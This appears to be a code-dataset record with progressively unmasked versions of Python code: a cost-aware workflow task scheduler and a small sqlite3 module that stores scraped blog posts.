"step-5": "from __future__ import print_function\r\n\r\nimport math\r\n\r\nimport db\r\nfrom db import writer\r\nfrom enum import Enum\r\n\r\nfrom Definitions.Graph import Task\r\n\r\n\r\nclass Constraint(Enum):\r\n deadline = 1\r\n budget = 2\r\n none = 3\r\n\r\n\r\ndef f_range(x, y, jump):\r\n while x < y:\r\n yield x\r\n x += jump\r\n\r\n\r\nclass TaskSchedule:\r\n def __init__(self, task, est=-1, runtime=-1, eft=-1, resource=-1):\r\n self.task = task\r\n self.EFT = eft\r\n self.EST = est\r\n self.runtime = runtime\r\n self.resource = resource\r\n\r\n\r\nclass Resources(object):\r\n len = -1\r\n bandwidth = 0\r\n\r\n def __init__(self, powers, bandwidth): # e.g. [1,1,2,2,4]\r\n number_of_resources = len(powers)\r\n self.power = powers\r\n self.tasksOfResource = [] # ordered set of TaskSchedule objects in every resource\r\n for i in range(number_of_resources):\r\n self.tasksOfResource.append([])\r\n self.len = number_of_resources\r\n self.bandwidth = bandwidth\r\n self.job_task_schedule = {} # job_task_schedule['Mine_10_1'][4].EFT == 12\r\n\r\n def find_gap(self, resource, start_time, runtime):\r\n '''\r\n finds a gap in resource and returns the start time and the place index of the task among the current tasks of the resource\r\n if resource is -1, it does nothing (returns the given start time, and -1 for place)\r\n '''\r\n if resource == -1:\r\n return start_time, -1\r\n number_of_tasks = len(self.tasksOfResource[resource])\r\n if number_of_tasks == 0:\r\n return start_time, 0\r\n elif self.tasksOfResource[resource][0].EST >= start_time + runtime:\r\n return start_time, 0\r\n elif number_of_tasks == 1:\r\n if self.tasksOfResource[resource][0].EFT < start_time:\r\n return start_time, 1\r\n else:\r\n return self.tasksOfResource[resource][0].EFT, 1\r\n else:\r\n for i in range(1, number_of_tasks):\r\n if self.tasksOfResource[resource][i].EST <= start_time:\r\n continue\r\n elif start_time < self.tasksOfResource[resource][i - 1].EFT:\r\n gap = self.tasksOfResource[resource][i].EST - self.tasksOfResource[resource][i - 1].EFT\r\n if gap < runtime:\r\n continue\r\n else:\r\n return self.tasksOfResource[resource][i - 1].EFT, i\r\n elif self.tasksOfResource[resource][i - 1].EFT <= start_time < self.tasksOfResource[resource][i].EST:\r\n if self.tasksOfResource[resource][i].EST - start_time < runtime:\r\n continue\r\n else:\r\n return start_time, i\r\n else: # no gap is found, put it at the end (it can be done using append method)\r\n return max(self.tasksOfResource[resource][-1].EFT, start_time), -1\r\n\r\n def calculate_eft(self, task, resource_id, arrival_time=0):\r\n g = task.graph\r\n if resource_id == -1:\r\n graphs_task_on_resource = []\r\n task_runtime_on_resource = task.weight / max(self.power)\r\n else:\r\n task_runtime_on_resource = task.weight / self.power[resource_id]\r\n graphs_task_on_resource = list(\r\n map(lambda t: t.task.id if t.task.graph.name == g.name else -1, self.tasksOfResource[resource_id]))\r\n max_est_of_task = arrival_time\r\n for p in task.predecessor:\r\n # check if p and task.id on the same resource_id\r\n if p in graphs_task_on_resource:\r\n communication_delay = 0\r\n else:\r\n communication_delay = task.predecessor[p] / self.bandwidth\r\n if g.name not in self.job_task_schedule or p not in self.job_task_schedule[g.name]:\r\n continue\r\n p_eft = self.job_task_schedule[g.name][p].EFT\r\n if p_eft + communication_delay > max_est_of_task:\r\n max_est_of_task = p_eft + communication_delay\r\n # EST Of Task is found and stored in max_est_of_task\r\n # Find a gap to 
schedule it:\r\n start_time, place_id = self.find_gap(resource_id, max_est_of_task, task_runtime_on_resource)\r\n eft_task = start_time + task_runtime_on_resource\r\n return start_time, eft_task, task_runtime_on_resource, place_id\r\n\r\n def schedule(self, task_schedule, place_id=-1):\r\n \"\"\"\r\n Schedules a task in a place id. if place_id is -1 the schedule is appended to the last.\r\n :type task_schedule: TaskSchedule\r\n :type place_id: int\r\n \"\"\"\r\n resource = task_schedule.resource\r\n if place_id == -1:\r\n self.tasksOfResource[resource].append(task_schedule)\r\n else:\r\n self.tasksOfResource[resource].insert(place_id, task_schedule)\r\n if task_schedule.task.graph.name in self.job_task_schedule:\r\n pass\r\n else:\r\n self.job_task_schedule[task_schedule.task.graph.name] = {}\r\n self.job_task_schedule[task_schedule.task.graph.name][task_schedule.task.id] = task_schedule\r\n\r\n\r\n def show_schedule(self, job_id=-1, finishing=None, print_enabled=False):\r\n result = []\r\n for r in range(0, self.len):\r\n names = []\r\n est = []\r\n eft = []\r\n\r\n def add_entries(x):\r\n if job_id != -1 and x.task.graph.name != job_id:\r\n return\r\n names.append(x.task.id if job_id != -1 else f'{x.task.graph.name}-{x.task.id}')\r\n est.append(x.EST)\r\n eft.append(x.EFT)\r\n\r\n list(map(add_entries, self.tasksOfResource[r]))\r\n\r\n result.append((names, est, eft))\r\n\r\n def print_list(x):\r\n if not print_enabled:\r\n return\r\n first = True\r\n for e in x:\r\n if first:\r\n first = False\r\n else:\r\n print(',', end=' ')\r\n print(e, end=' ')\r\n print()\r\n\r\n print_list(names)\r\n print_list(est)\r\n print_list(eft)\r\n if finishing is not None and print_enabled:\r\n print(finishing)\r\n\r\n return result\r\n\r\n\r\n def write_schedule(self, db_file, test_name='N/A', extra='single', policy='', job_count=1):\r\n w = writer.Writer(db_file)\r\n w.create_plan()\r\n\r\n w.create_plan_head()\r\n unique_jobs_id = w.write_plan_head(test_name, policy, job_count)\r\n\r\n def add_entries(x):\r\n job_name, job_type, task_id, jobs_id, start_time,\\\r\n finish_time, resource_id, resource_speed, \\\r\n job_component_id, extra_params = x.task.graph.name, x.task.graph.type, x.task.id, unique_jobs_id\\\r\n , x.EST,\\\r\n x.EFT, r, self.power[r], policy, extra\r\n\r\n w.write_plan(job_name, job_type, task_id, jobs_id, start_time, finish_time, resource_id,\r\n resource_speed, job_component_id, extra_params)\r\n\r\n for r in range(0, self.len):\r\n list(map(add_entries, self.tasksOfResource[r]))\r\n\r\n w.commit()\r\n w.close()\r\n\r\n @property\r\n def average_power(self):\r\n return math.fsum(self.power) / self.len\r\n\r\n @property\r\n def makespan(self):\r\n eft = 0\r\n for i in range(0, self.len):\r\n tasks_in_resource = self.tasksOfResource[i]\r\n if len(tasks_in_resource) == 0:\r\n continue\r\n eft = max(eft, tasks_in_resource[-1].EFT)\r\n return eft\r\n\r\n def sum_gaps_resource(self, resource_id):\r\n tasks_in_current_resource = self.tasksOfResource[resource_id]\r\n num_tasks = len(tasks_in_current_resource)\r\n if num_tasks <= 1:\r\n return 0\r\n sum_gaps = 0\r\n for i in range(1, num_tasks):\r\n if tasks_in_current_resource[i - 1].task.dummy_task or tasks_in_current_resource[i].task.dummy_task:\r\n continue\r\n finish_prev = tasks_in_current_resource[i - 1].EFT\r\n start_current = tasks_in_current_resource[i].EST\r\n gap_length = start_current - finish_prev\r\n if gap_length < 0:\r\n raise Exception('Schedule is not correct, check gaps!')\r\n sum_gaps += gap_length\r\n return 
sum_gaps\r\n\r\n @property\r\n def sum_internal_gaps(self):\r\n sum_gaps = 0\r\n for r in range(0, self.len):\r\n sum_gaps += self.sum_gaps_resource(r)\r\n return sum_gaps\r\n\r\n def select_resource(self, task, arrival_time=0):\r\n est_best, eft_best, runtime_on_resource_best, place_id_best, resource_id_best = -1, -1, -1, -1, -1\r\n for r in range(0, self.len):\r\n max_est_of_task, eft_task, task_runtime_on_resource, place_id = self.calculate_eft(task, r, arrival_time=arrival_time)\r\n if eft_best == -1 or eft_task < eft_best:\r\n est_best, eft_best, runtime_on_resource_best, place_id_best, resource_id_best = \\\r\n max_est_of_task, eft_task, task_runtime_on_resource, place_id, r\r\n return est_best, runtime_on_resource_best, eft_best, resource_id_best, place_id_best\r\n\r\n def get_fastest_empty_resource(self):\r\n for r in range(self.len - 1, -1, -1):\r\n if len(self.tasksOfResource[r]) == 0:\r\n return r\r\n else:\r\n return -1\r\n\r\n\r\nclass CostAwareResources(Resources):\r\n def __init__(self, powers, prices, timeslot_len, bandwidth):\r\n super(CostAwareResources, self).__init__(powers, bandwidth)\r\n self.timeslot = timeslot_len\r\n self.price = prices\r\n self.head_nodes = {}\r\n self.sum_weight_scheduled = {}\r\n\r\n\r\n def resource_cost(self, resource_id, start_time=-1, eft=-1, cost_only=True):\r\n \"\"\"\r\n computes a resource's cost. if cost_only==True, only returns cost, otherwise it returns also start and finish-times.\r\n :param resource_id:\r\n :param start_time:\r\n :param eft:\r\n :param cost_only:\r\n :return:\r\n \"\"\"\r\n tasks_in_resource = [t for t in self.tasksOfResource[resource_id] if not t.task.dummy_task]\r\n if not tasks_in_resource:\r\n if eft == -1:\r\n return 0 if cost_only else (0, 0, 0)\r\n else:\r\n return math.ceil((eft - start_time) / self.timeslot[resource_id]) * self.price[resource_id]\r\n if start_time != -1:\r\n task_start_time = min(tasks_in_resource[0].EST, start_time)\r\n else:\r\n task_start_time = tasks_in_resource[0].EST\r\n task_finish_time = max(tasks_in_resource[-1].EFT, eft)\r\n reservation = task_finish_time - task_start_time\r\n cost = math.ceil(reservation / self.timeslot[resource_id]) * self.price[resource_id]\r\n\r\n\r\n timeslot = self.timeslot[resource_id]\r\n startof = [x.EST for x in tasks_in_resource]\r\n endof = [x.EFT for x in tasks_in_resource]\r\n\r\n if start_time != -1:\r\n startof.append(start_time)\r\n endof.append(eft)\r\n startof.sort()\r\n endof.sort()\r\n\r\n timeslot_start = min(startof)\r\n last_finish_time = max(endof)\r\n current_task_id = 0\r\n\r\n rent_periods = []\r\n\r\n while timeslot_start < last_finish_time:\r\n task_len = endof[current_task_id] - timeslot_start\r\n time_slot_finish = endof[current_task_id] + (timeslot - (task_len % timeslot)) % timeslot\r\n current_task_id += 1\r\n if current_task_id >= len(startof):\r\n rent_periods.append((timeslot_start, time_slot_finish))\r\n break\r\n if startof[current_task_id] <= time_slot_finish:\r\n pass\r\n else:\r\n rent_periods.append((timeslot_start, time_slot_finish))\r\n timeslot_start = startof[current_task_id]\r\n\r\n sum = 0\r\n for rp in rent_periods:\r\n sum += (rp[1] - rp[0])\r\n cost = sum / timeslot * self.price[resource_id]\r\n\r\n if cost_only:\r\n return cost\r\n else:\r\n return cost, min(startof), (max(endof))\r\n\r\n\r\n def resource_start_time(self, resource_id):\r\n tasks_in_resource = self.tasksOfResource[resource_id]\r\n length = len(tasks_in_resource)\r\n start_index = 0\r\n while length > 0 and 
tasks_in_resource[start_index].task.dummy_task:\r\n start_index += 1\r\n length -= 1\r\n if length == 0:\r\n return -1\r\n return tasks_in_resource[start_index].EST\r\n\r\n @property\r\n def plan_cost(self):\r\n cost = 0\r\n for i in range(0, self.len):\r\n cost += self.resource_cost(i)\r\n return cost\r\n\r\n def calculate_shared_cost_within_timeslot(self, timeslot_start, est, ft, resource_id, task_id=None):\r\n timeslot_end = timeslot_start + self.timeslot[resource_id]\r\n if ft <= timeslot_start or est >= timeslot_end:\r\n return 0\r\n tasks = self.tasksOfResource[resource_id]\r\n task_ids = self.task_id_in_timeslot(resource_id, timeslot_start)\r\n sum_w = 0\r\n for id in task_ids:\r\n if task_id == id:\r\n continue\r\n start_time = tasks[id].EST\r\n finish_time = tasks[id].EFT\r\n if start_time < timeslot_start:\r\n start_time = timeslot_start\r\n if finish_time > timeslot_end:\r\n finish_time = timeslot_end\r\n sum_w += finish_time - start_time\r\n if est < timeslot_start:\r\n est = timeslot_start\r\n if ft > timeslot_end:\r\n ft = timeslot_end\r\n if ft == est:\r\n return 0\r\n share = float(ft - est) / (sum_w + ft - est)\r\n return share * self.price[resource_id]\r\n\r\n def task_id_in_timeslot(self, resource_id, timeslot_start):\r\n timeslot_end = timeslot_start + self.timeslot[resource_id]\r\n task_ids = []\r\n\r\n for id in range(len(self.tasksOfResource[resource_id])):\r\n s = self.tasksOfResource[resource_id][id]\r\n if timeslot_start <= s.EST <= timeslot_end or timeslot_start <= s.EFT <= timeslot_end \\\r\n or s.EST < timeslot_start and timeslot_end < s.EFT:\r\n task_ids.append(id)\r\n return task_ids\r\n\r\n def calculate_task_shared_cost(self, est=-1, ft=-1, resource_id=-1, task_id=None):\r\n if task_id is not None:\r\n # this task has already been scheduled\r\n est = self.tasksOfResource[resource_id][task_id].EST\r\n ft = self.tasksOfResource[resource_id][task_id].EFT\r\n\r\n timeslot_len = self.timeslot[resource_id]\r\n resource_start_time = self.resource_start_time(resource_id)\r\n if resource_start_time == -1:\r\n resource_start_time = est\r\n timeslot_start = float(timeslot_len) * math.floor((est - resource_start_time) /\r\n timeslot_len) + resource_start_time\r\n timeslot_end = float(timeslot_len) * math.ceil((ft - resource_start_time) /\r\n timeslot_len) + resource_start_time\r\n shared_cost = 0\r\n for interval in f_range(timeslot_start, timeslot_end + timeslot_len / 2, timeslot_len):\r\n share_in_interval = self.calculate_shared_cost_within_timeslot(interval, est, ft, resource_id, task_id)\r\n shared_cost += share_in_interval\r\n return shared_cost\r\n\r\n\r\n def calculate_eft_and_cost(self, task, resource_id, arrival_time=0):\r\n \"\"\"\r\n calculates eft and cost of a certain task on a certain resource.\r\n :param task:Definitions.Task()\r\n :param resource_id:\r\n :return:\r\n \"\"\"\r\n start_time, eft, runtime_on_resource, place_id = self.calculate_eft(task, resource_id, arrival_time=arrival_time)\r\n if task.dummy_task:\r\n return start_time, eft, runtime_on_resource, place_id, 0\r\n else:\r\n cost = self.calculate_share_cost_change(resource_id, start_time, eft, task.graph.name, True)\r\n return start_time, eft, runtime_on_resource, place_id, cost\r\n\r\n\r\n def sum_external_gaps_resource(self, r):\r\n c, s, e = self.resource_cost(r, cost_only=False)\r\n reservation = e - s\r\n timeslot = self.timeslot[r]\r\n gap = timeslot - reservation % timeslot\r\n if gap == timeslot:\r\n return 0\r\n else:\r\n return gap\r\n\r\n @property\r\n def 
sum_external_gaps(self):\r\n sum_gaps = 0\r\n for r in range(0, self.len):\r\n sum_gaps += self.sum_external_gaps_resource(r)\r\n return sum_gaps\r\n\r\n @property\r\n def sum_gaps(self):\r\n return self.sum_internal_gaps + self.sum_external_gaps\r\n\r\n @property\r\n def occupied_resources(self):\r\n counter = 0\r\n for i in range(self.len):\r\n if self.resource_cost(i) != 0:\r\n counter += self.price[i]\r\n return counter\r\n\r\n @property\r\n def gap_rate(self):\r\n return self.sum_gaps / self.makespan / self.occupied_resources\r\n\r\n def select_resource(self, task=Task(), test=None, arrival_time=0):\r\n eft_best = -1\r\n def something_found():\r\n return eft_best != -1\r\n\r\n if task.asap is not None:\r\n if not task.asap: # budget workflow\r\n if not test:\r\n print('', end='')\r\n # fastest affordable\r\n est_best, eft_best, runtime_on_resource_best, place_id_best, resource_id_best, cost_best = \\\r\n -1, -1, -1, -1, -1, -1\r\n\r\n for r in range(0, self.len):\r\n start_time, eft, runtime_on_resource, place_id, cost = self.calculate_eft_and_cost(task, r, arrival_time=arrival_time)\r\n if not something_found() or \\\r\n eft < eft_best and task.sub_deadline < eft_best or \\\r\n task.sub_budget < cost_best and eft <= task.sub_deadline and cost < cost_best or \\\r\n eft <= task.sub_deadline and cost <= task.sub_budget and \\\r\n (eft_best > task.sub_deadline or cost_best > task.sub_budget) or \\\r\n eft <= task.sub_deadline and cost <= task.sub_budget and eft < eft_best or \\\r\n eft <= task.sub_deadline and cost <= task.sub_budget and eft == eft_best and cost < cost_best:\r\n est_best, eft_best, runtime_on_resource_best, place_id_best, resource_id_best, cost_best = \\\r\n start_time, eft, runtime_on_resource, place_id, r, cost\r\n continue\r\n if not test:\r\n print('', end='')\r\n return est_best, runtime_on_resource_best, eft_best, resource_id_best, place_id_best, cost_best\r\n elif task.asap: # deadline workflow\r\n # cheapest before sub-deadline\r\n if not test:\r\n print('', end='')\r\n est_best, eft_best, runtime_on_resource_best, place_id_best, resource_id_best, cost_best = \\\r\n -1, -1, -1, -1, -1, -1\r\n for r in range(0, self.len):\r\n start_time, eft, runtime_on_resource, place_id, cost = self.calculate_eft_and_cost(task, r, arrival_time=arrival_time)\r\n # if eft_best == -1 or eft_best > eft > task.sub_deadline or task.sub_deadline >= eft and (\r\n # cost < cost_best or eft_best > task.sub_deadline):\r\n if not something_found() or \\\r\n eft < eft_best and task.sub_deadline < eft_best or \\\r\n task.sub_budget < cost_best and eft <= task.sub_deadline and cost < cost_best or \\\r\n eft <= task.sub_deadline and cost <= task.sub_budget and \\\r\n (eft_best > task.sub_deadline or cost_best > task.sub_budget) or \\\r\n eft <= task.sub_deadline and cost <= task.sub_budget and cost < cost_best or \\\r\n eft <= task.sub_deadline and cost <= task.sub_budget and cost == cost_best and eft < eft_best:\r\n est_best, eft_best, runtime_on_resource_best, place_id_best, resource_id_best, cost_best = \\\r\n start_time, eft, runtime_on_resource, place_id, r, cost\r\n # if cost_best == -1 or cost_best > cost > task.sub_budget or task.sub_budget >= cost and (\r\n # eft < eft_best or cost_best > task.sub_budget):\r\n # est_best, eft_best, runtime_on_resource_best, place_id_best, resource_id_best, cost_best = \\\r\n # start_time, eft, runtime_on_resource, place_id, r, cost\r\n continue\r\n if not test:\r\n print('', end='')\r\n return est_best, runtime_on_resource_best, eft_best, 
resource_id_best, place_id_best, cost_best\r\n else:\r\n # minimize time (as in HEFT) TODO: it doesn't return cost (as the sixth return value)\r\n return super(CostAwareResources, self).select_resource(task)\r\n\r\n def price_of_each_graph(self):\r\n graph_names = self.job_task_schedule.keys()\r\n costs = {}\r\n for name in graph_names:\r\n costs[name] = 0\r\n for r in range(self.len):\r\n for id in range(len(self.tasksOfResource[r])):\r\n name = self.tasksOfResource[r][id].task.graph.name\r\n cost = self.calculate_task_shared_cost(resource_id=r, task_id=id)\r\n costs[name] += cost\r\n return costs\r\n\r\n def get_cheapest_empty_resource(self):\r\n for r in range(self.len):\r\n if len(self.tasksOfResource[r]) == 0:\r\n return r\r\n else:\r\n return -1\r\n\r\n def schedule(self, task_schedule, place_id=-1, do_head_nodes=False):\r\n super(CostAwareResources, self).schedule(task_schedule, place_id)\r\n\r\n # head_node computations:\r\n if not do_head_nodes:\r\n return\r\n if task_schedule.task.graph.name in self.head_nodes:\r\n prev_heads = self.head_nodes[task_schedule.task.graph.name]\r\n parents_of_current_task = task_schedule.task.predecessor.keys()\r\n self.head_nodes[task_schedule.task.graph.name] = self.head_nodes[task_schedule.task.graph.name].difference(\r\n parents_of_current_task)\r\n self.head_nodes[task_schedule.task.graph.name].add(task_schedule.task.id)\r\n else:\r\n self.head_nodes[task_schedule.task.graph.name] = set()\r\n self.head_nodes[task_schedule.task.graph.name].add(task_schedule.task.id)\r\n self.sum_weight_scheduled[task_schedule.task.graph.name] = 0\r\n\r\n self.sum_weight_scheduled[task_schedule.task.graph.name] += task_schedule.task.weight\r\n\r\n def calculate_share_cost_change(self, resource_id, est=-1, eft=-1, job_id=-1, only_this_job=False):\r\n sum_w = {}\r\n for i in range(len(self.tasksOfResource[resource_id])):\r\n sch = self.tasksOfResource[resource_id][i]\r\n job = sch.task.graph.name\r\n if job not in sum_w:\r\n sum_w[job] = 0\r\n sum_w[job] += sch.EFT - sch.EST\r\n sum_w_all_old = sum(sum_w.values())\r\n prev_cost_resource = self.resource_cost(resource_id)\r\n prev_cost_job = {}\r\n for j in sum_w.keys():\r\n if sum_w_all_old == 0:\r\n prev_cost_job[j] = 0\r\n else:\r\n prev_cost_job[j] = float(prev_cost_resource) * sum_w[j] / sum_w_all_old\r\n if est == -1:\r\n return prev_cost_job\r\n\r\n new_cost_resource = self.resource_cost(resource_id, start_time=est, eft=eft)\r\n if job_id not in sum_w:\r\n sum_w[job_id] = 0\r\n sum_w[job_id] += eft - est\r\n sum_w_all_new = sum_w_all_old + eft - est\r\n\r\n new_cost_job = {}\r\n changes = {}\r\n for j in sum_w.keys():\r\n if sum_w_all_new == 0:\r\n new_cost_job[j] = 0\r\n else:\r\n new_cost_job[j] = float(new_cost_resource) * sum_w[j] / sum_w_all_new\r\n if j not in prev_cost_job:\r\n changes[j] = new_cost_job[j]\r\n else:\r\n changes[j] = new_cost_job[j] - prev_cost_job[j]\r\n if only_this_job:\r\n return changes[job_id]\r\n return changes\r\n",
"step-ids": [
22,
28,
32,
36,
40
]
}
|
[
22,
28,
32,
36,
40
] |
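A minimal standalone sketch (the function name and the sample intervals are illustrative, not part of the dataset row above) distilling the rent-period costing idea from CostAwareResources.resource_cost: a task whose start still falls inside an already-rented timeslot shares that rental, while a larger gap opens a new rental period billed in whole timeslots.

def rental_cost(intervals, timeslot, price):
    """intervals: (start, finish) pairs sorted by start; rentals are billed per whole timeslot."""
    if not intervals:
        return 0
    startof = sorted(s for s, _ in intervals)
    endof = sorted(f for _, f in intervals)
    rent_periods = []
    slot_start = startof[0]
    i = 0
    while True:
        used = endof[i] - slot_start
        # round the current finish up to the next slot boundary anchored at slot_start
        slot_finish = endof[i] + (timeslot - used % timeslot) % timeslot
        i += 1
        if i >= len(startof):              # last task closes the final period
            rent_periods.append((slot_start, slot_finish))
            break
        if startof[i] > slot_finish:       # gap too large: start a new rental
            rent_periods.append((slot_start, slot_finish))
            slot_start = startof[i]
    total = sum(f - s for s, f in rent_periods)
    return total / timeslot * price

# Two tasks share one 10-unit slot; the third opens a second rental:
# rental_cost([(0, 4), (5, 9), (25, 30)], timeslot=10, price=2.0) -> 4.0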
<|reserved_special_token_0|>
def createPosts(posts):
conn = sqlite3.connect(dbname)
c = conn.cursor()
for post in posts:
c.execute('INSERT OR REPLACE INTO posts VALUES (?,?,?,?,?,?)', post)
conn.commit()
conn.close()
def readPosts():
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute('SELECT * FROM posts')
posts = c.fetchall()
conn.commit()
conn.close()
return posts
def dropTable():
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute('DROP table IF EXISTS posts')
conn.commit()
conn.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def createTable():
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute(
"""CREATE TABLE IF NOT EXISTS posts
(url text primary key,
title text,
date text,
authorLink text,
authorName text,
view text)
"""
)
conn.commit()
conn.close()
def createPosts(posts):
conn = sqlite3.connect(dbname)
c = conn.cursor()
for post in posts:
c.execute('INSERT OR REPLACE INTO posts VALUES (?,?,?,?,?,?)', post)
conn.commit()
conn.close()
def readPosts():
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute('SELECT * FROM posts')
posts = c.fetchall()
conn.commit()
conn.close()
return posts
def dropTable():
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute('DROP table IF EXISTS posts')
conn.commit()
conn.close()
<|reserved_special_token_1|>
__author__ = 'laispace.com'
<|reserved_special_token_0|>
dbname = 'alloyteam.db'
def createTable():
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute(
"""CREATE TABLE IF NOT EXISTS posts
(url text primary key,
title text,
date text,
authorLink text,
authorName text,
view text)
"""
)
conn.commit()
conn.close()
def createPosts(posts):
conn = sqlite3.connect(dbname)
c = conn.cursor()
for post in posts:
c.execute('INSERT OR REPLACE INTO posts VALUES (?,?,?,?,?,?)', post)
conn.commit()
conn.close()
def readPosts():
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute('SELECT * FROM posts')
posts = c.fetchall()
conn.commit()
conn.close()
return posts
def dropTable():
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute('DROP table IF EXISTS posts')
conn.commit()
conn.close()
<|reserved_special_token_1|>
__author__ = 'laispace.com'
import sqlite3
dbname = 'alloyteam.db'
def createTable():
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute(
"""CREATE TABLE IF NOT EXISTS posts
(url text primary key,
title text,
date text,
authorLink text,
authorName text,
view text)
"""
)
conn.commit()
conn.close()
def createPosts(posts):
conn = sqlite3.connect(dbname)
c = conn.cursor()
for post in posts:
c.execute('INSERT OR REPLACE INTO posts VALUES (?,?,?,?,?,?)', post)
conn.commit()
conn.close()
def readPosts():
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute('SELECT * FROM posts')
posts = c.fetchall()
conn.commit()
conn.close()
return posts
def dropTable():
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute('DROP table IF EXISTS posts')
conn.commit()
conn.close()
<|reserved_special_token_1|>
__author__ = 'laispace.com'
import sqlite3
dbname = 'alloyteam.db'
def createTable():
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute('''CREATE TABLE IF NOT EXISTS posts
(url text primary key,
title text,
date text,
authorLink text,
authorName text,
view text)
''')
conn.commit()
conn.close()
def createPosts(posts):
conn = sqlite3.connect(dbname)
c = conn.cursor()
for post in posts:
c.execute('INSERT OR REPLACE INTO posts VALUES (?,?,?,?,?,?)', post)
# c.executemany('INSERT OR REPLACE INTO posts VALUES (?,?,?,?,?,?)', posts)
conn.commit()
conn.close()
def readPosts():
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute('SELECT * FROM posts')
posts = c.fetchall()
conn.commit()
conn.close()
return posts
def dropTable():
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute('DROP table IF EXISTS posts')
conn.commit()
conn.close()
|
flexible
|
{
"blob_id": "602df213c0d588404597c566001cd9c96b5034d0",
"index": 4530,
"step-1": "<mask token>\n\n\ndef createPosts(posts):\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n for post in posts:\n c.execute('INSERT OR REPLACE INTO posts VALUES (?,?,?,?,?,?)', post)\n conn.commit()\n conn.close()\n\n\ndef readPosts():\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n c.execute('SELECT * FROM posts')\n posts = c.fetchall()\n conn.commit()\n conn.close()\n return posts\n\n\ndef dropTable():\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n c.execute('DROP table IF EXISTS posts')\n conn.commit()\n conn.close()\n",
"step-2": "<mask token>\n\n\ndef createTable():\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS posts\n (url text primary key,\n title text,\n date text,\n authorLink text,\n authorName text,\n view text)\n \"\"\"\n )\n conn.commit()\n conn.close()\n\n\ndef createPosts(posts):\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n for post in posts:\n c.execute('INSERT OR REPLACE INTO posts VALUES (?,?,?,?,?,?)', post)\n conn.commit()\n conn.close()\n\n\ndef readPosts():\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n c.execute('SELECT * FROM posts')\n posts = c.fetchall()\n conn.commit()\n conn.close()\n return posts\n\n\ndef dropTable():\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n c.execute('DROP table IF EXISTS posts')\n conn.commit()\n conn.close()\n",
"step-3": "__author__ = 'laispace.com'\n<mask token>\ndbname = 'alloyteam.db'\n\n\ndef createTable():\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS posts\n (url text primary key,\n title text,\n date text,\n authorLink text,\n authorName text,\n view text)\n \"\"\"\n )\n conn.commit()\n conn.close()\n\n\ndef createPosts(posts):\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n for post in posts:\n c.execute('INSERT OR REPLACE INTO posts VALUES (?,?,?,?,?,?)', post)\n conn.commit()\n conn.close()\n\n\ndef readPosts():\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n c.execute('SELECT * FROM posts')\n posts = c.fetchall()\n conn.commit()\n conn.close()\n return posts\n\n\ndef dropTable():\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n c.execute('DROP table IF EXISTS posts')\n conn.commit()\n conn.close()\n",
"step-4": "__author__ = 'laispace.com'\nimport sqlite3\ndbname = 'alloyteam.db'\n\n\ndef createTable():\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS posts\n (url text primary key,\n title text,\n date text,\n authorLink text,\n authorName text,\n view text)\n \"\"\"\n )\n conn.commit()\n conn.close()\n\n\ndef createPosts(posts):\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n for post in posts:\n c.execute('INSERT OR REPLACE INTO posts VALUES (?,?,?,?,?,?)', post)\n conn.commit()\n conn.close()\n\n\ndef readPosts():\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n c.execute('SELECT * FROM posts')\n posts = c.fetchall()\n conn.commit()\n conn.close()\n return posts\n\n\ndef dropTable():\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n c.execute('DROP table IF EXISTS posts')\n conn.commit()\n conn.close()\n",
"step-5": "__author__ = 'laispace.com'\n\nimport sqlite3\n\ndbname = 'alloyteam.db'\n\ndef createTable():\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n c.execute('''CREATE TABLE IF NOT EXISTS posts\n (url text primary key,\n title text,\n date text,\n authorLink text,\n authorName text,\n view text)\n ''')\n conn.commit()\n conn.close()\n\ndef createPosts(posts):\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n for post in posts:\n c.execute('INSERT OR REPLACE INTO posts VALUES (?,?,?,?,?,?)', post)\n # c.executemany('INSERT OR REPLACE INTO posts VALUES (?,?,?,?,?,?)', posts)\n conn.commit()\n conn.close()\n\ndef readPosts():\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n c.execute('SELECT * FROM posts')\n posts = c.fetchall()\n conn.commit()\n conn.close()\n return posts\n\ndef dropTable():\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n c.execute('DROP table IF EXISTS posts')\n conn.commit()\n conn.close()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
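An illustrative driver for the sqlite3 helpers in the row above, assuming the final version is saved as db.py; the sample tuple follows the (url, title, date, authorLink, authorName, view) schema.

import db

db.dropTable()                      # start from a clean slate
db.createTable()
db.createPosts([
    ('http://example.com/p1', 'Hello', '2015-01-01', '/author/alice', 'alice', '42'),
])
print(db.readPosts())               # [('http://example.com/p1', 'Hello', ...)]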
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'mapGraph.ui'
#
